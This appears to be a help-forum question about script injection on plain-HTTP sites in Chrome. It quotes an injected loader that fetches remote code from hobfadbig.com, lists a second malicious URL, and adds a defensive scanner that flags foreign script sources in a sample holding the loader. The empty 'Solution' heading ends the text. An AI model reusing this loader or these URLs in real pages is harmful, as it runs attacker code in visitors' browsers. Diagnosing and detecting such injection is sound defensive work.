google-chrome - Clickjacked every non secure site (http) by hobfadbig.com
Problem description
All my browsers are click-jacked by some kind of method, I am not sure how.
After spending a huge amount of time, I somehow figured out who is doing this.
A domain named hobfadbig.com is injecting the script below into the jquery-1.4.2.min.js
file on every non-HTTPS site. Secure sites work fine as they are, but this attack works on non-secure HTTP web sites.
```javascript
document.addEventListener(
  'DOMContentLoaded',
  function () {
    var esp = document.createElement('span');
    var esr = document.createElement('script');
    esr.src = 'http://hobfadbig.com/ryjlRQHB8rfBdYEZN/6922?ndn=m2';
    esr.type = 'text/javascript';
    esp.appendChild(esr);
    document.body.appendChild(esp);
  },
  false
);
```
I have already tried these things:
- cleared cookies
- Uninstalled browser and installed it again
- Even changed operating system
- Linux and Windows both have the same issue
Still, somehow the attack is successful.
Update: another source of this type of attack: http://tareinlettartar.com/rgGUtPyNvlNBEQld3/6932?aDcPgiD=1&aDgRpiD=93&tAgaDiD=296&nsVnM=m2
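
A check for the pattern quoted in the question, as an added example that is not part of the original post: it scans a served JavaScript body for dynamically created script elements whose `src` points at a host outside an allowlist. The function name, the allowlist and the stand-in library line are assumptions; the loader lines are the ones quoted above.

```javascript
// Constructed sample: a stand-in for the library body followed by the
// appended loader quoted in the question. Not a capture of real traffic.
const SAMPLE_BODY = [
  "/* jquery-1.4.2.min.js body (constructed stand-in) */",
  "(function (w) { w.jQuery = w.$ = function () {}; })(window);",
  "document.addEventListener('DOMContentLoaded', function () {",
  "  var esp = document.createElement('span');",
  "  var esr = document.createElement('script');",
  "  esr.src = 'http://hobfadbig.com/ryjlRQHB8rfBdYEZN/6922?ndn=m2';",
  "  esr.type = 'text/javascript';",
  "  esp.appendChild(esr);",
  "  document.body.appendChild(esp);",
  "}, false);",
].join("\n");

// Hypothetical helper: returns the sorted list of hosts that dynamically
// created <script> elements in jsText load from, minus hosts in allowedHosts.
function findForeignScriptHosts(jsText, allowedHosts) {
  const allowed = new Set(allowedHosts.map((h) => h.toLowerCase()));

  // Step 1: collect variable names assigned from createElement('script').
  const createRe =
    /([A-Za-z_$][\w$]*)\s*=\s*document\.createElement\(\s*['"]script['"]\s*\)/gi;
  const scriptVars = new Set();
  for (const m of jsText.matchAll(createRe)) scriptVars.add(m[1]);

  // Step 2: find string literals assigned to .src on those variables only,
  // so image or iframe sources are not reported.
  const srcRe = /([A-Za-z_$][\w$]*)\.src\s*=\s*['"]([^'"]+)['"]/g;
  const hosts = new Set();
  for (const m of jsText.matchAll(srcRe)) {
    if (!scriptVars.has(m[1])) continue;
    let host;
    try {
      // Relative URLs resolve against a placeholder base and are skipped.
      host = new URL(m[2], "http://relative.invalid/").hostname.toLowerCase();
    } catch {
      continue; // not parseable as a URL
    }
    if (host !== "relative.invalid" && !allowed.has(host)) hosts.add(host);
  }
  return [...hosts].sort();
}

console.log(findForeignScriptHosts(SAMPLE_BODY, ["code.jquery.com"]));
```

Running the same function over the copy of a file served on http:// and the copy served on https:// shows whether the extra loader is present only on the plaintext path, which is the behaviour the question describes.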
Solution